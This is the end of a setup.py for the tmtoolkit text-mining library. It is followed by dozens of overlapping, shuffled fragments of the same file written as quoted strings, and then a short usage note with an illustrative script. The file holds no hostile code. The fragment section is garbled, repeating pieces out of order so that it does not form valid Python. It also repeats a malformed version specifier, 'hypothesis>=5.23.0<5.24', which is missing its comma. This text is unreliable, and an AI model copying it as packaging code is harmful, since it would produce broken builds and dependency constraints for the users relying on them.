        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Topic :: Scientific/Engineering :: Information Analysis',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: Utilities',
    ],
    keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation',
    packages=find_packages(exclude=['tests', 'examples']),
    include_package_data=True,
    python_requires='>=3.6',
    install_requires=DEPS_BASE,
    extras_require=DEPS_EXTRA
)
"'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0',",
"import open from setuptools import setup, find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0'",
":: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], keywords='textmining",
"} DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps in",
"'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming",
"Beta', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved",
"'/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 -",
"- Beta', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI",
"= 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache License 2.0'",
"__license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2',",
"['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2',",
"with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__, description='Text",
"'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0',",
"textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests', 'examples']), include_package_data=True, python_requires='>=3.6',",
"'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = {",
"'<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6',",
"encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic",
"Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python",
"}, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience",
"Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests',",
"f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL,",
"'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'],",
"Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source':",
"Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS",
"'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0',",
"long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>',",
"Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python",
"['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra':",
"file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__,",
"= 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA =",
"'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7',",
"Software License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language",
":: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3',",
":: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python ::",
"DEPS_EXTRA['all'] = [] for k, deps in DEPS_EXTRA.items(): if k not in {'recommended',",
"Information Analysis', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic ::",
"'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'],",
"'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL",
"= '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2',",
"find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache",
"'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export':",
"Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status",
"long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__,",
"project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[",
"3.8', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: Software Development :: Libraries",
"Python Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling",
"2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4']"
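As a usage note, the meta-extras assembled above resolve through pip's bracket syntax, e.g. `pip install "tmtoolkit[recommended]"` or `pip install "tmtoolkit[all]"`. The self-contained sketch below (illustrative only, not part of setup.py; it reuses two of the real extras) replays the aggregation logic so the resulting flattened dependency list can be inspected without invoking setup():

# Illustrative, self-contained replay of the meta-extra aggregation above;
# the extra names are real, but this snippet is not part of tmtoolkit.
extras = {
    'excel_export': ['openpyxl>=3.0.0'],
    'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'],
}

# 'recommended' is a hand-picked union of concrete extras ...
extras['recommended'] = extras['excel_export'] + extras['wordclouds']

# ... while 'all' flattens every concrete extra, skipping the meta-extras
# so their contents are not double-counted.
extras['all'] = []
for name, deps in extras.items():
    if name not in {'recommended', 'all'}:
        extras['all'].extend(deps)

print(extras['all'])
# -> ['openpyxl>=3.0.0', 'wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3']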